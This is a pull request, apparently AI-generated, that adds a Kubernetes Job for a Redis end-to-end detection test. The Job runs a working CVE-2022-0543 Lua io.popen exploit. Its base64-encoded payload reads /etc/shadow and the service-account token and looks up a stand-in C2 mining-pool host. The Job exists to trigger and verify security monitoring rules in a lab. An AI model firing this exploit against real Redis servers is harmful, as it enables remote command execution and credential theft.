### PR TITLE
example/redis/redis-tests: add bobctl-free one-shot attack Job

### DIFF
--- a/example/redis/redis-tests/attack-job.yaml
+++ b/example/redis/redis-tests/attack-job.yaml
@@ -1,0 +1,33 @@
+apiVersion: batch/v1
+kind: Job
+metadata:
+  name: redis-attack-once
+  namespace: redis-demo
+  labels:
+    app: redis-attack
+spec:
+  backoffLimit: 0
+  ttlSecondsAfterFinished: 900
+  template:
+    metadata:
+      labels:
+        app: redis-attack
+    spec:
+      restartPolicy: Never
+      containers:
+        - name: attack
+          image: redis:7-alpine
+          command: ["sh", "-c"]
+          args:
+            - |
+              set -e
+              DOM="c2-$(date +%s).miningpool.evil.example.com"
+              MAL=$(printf '%s\n' \
+                'id' \
+                'whoami' \
+                'cat /etc/shadow 2>&1 | head -1' \
+                'cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>&1 | head -c 20' \
+                "getent hosts ${DOM} 2>&1 || echo dnsdone" \
+                'echo mal_done' | base64 | tr -d '\n')
+              exec redis-cli -h redis -p 6379 EVAL \
+                "local f=io.popen('echo ${MAL}|base64 -d|sh 2>&1'); local o=f:read('*a'); f:close(); return o" 0


### PR DESCRIPTION
Complements the `AttackSuite` CRs (which need the bobctl controller) with a plain Kubernetes **Job** so the redis e2e is runnable from git with no extra tooling:

```
skaffold deploy -m soc-stack -p k3s     # soc — forensics stack
skaffold deploy -m redis-apps -p k3s    # bob — redis + SBoB (#184)
kubectl apply -f example/redis/redis-tests/attack-job.yaml   # this — fire once
```

`redis-attack-once` fires the CVE-2022-0543 Lua `io.popen` chain (id / whoami / cat /etc/shadow / SA-token read / getent C2) against the redis **Service**, so the **server pod** processes the EVAL (its `redis_events` are captured) and trips R0001/R0010/R0006/R0005. `restartPolicy: Never` + `backoffLimit: 0` → runs exactly once; `ttlSecondsAfterFinished` cleans up.

Verified end-to-end on the soc-stack + AE (pem-direct) + redis-apps stack: kubescape → dx → AE captured redis_events / dc_snoop / stack_trace / conn_stats / dns_events.

🤖 Generated with [Claude Code](https://claude.com/claude-code)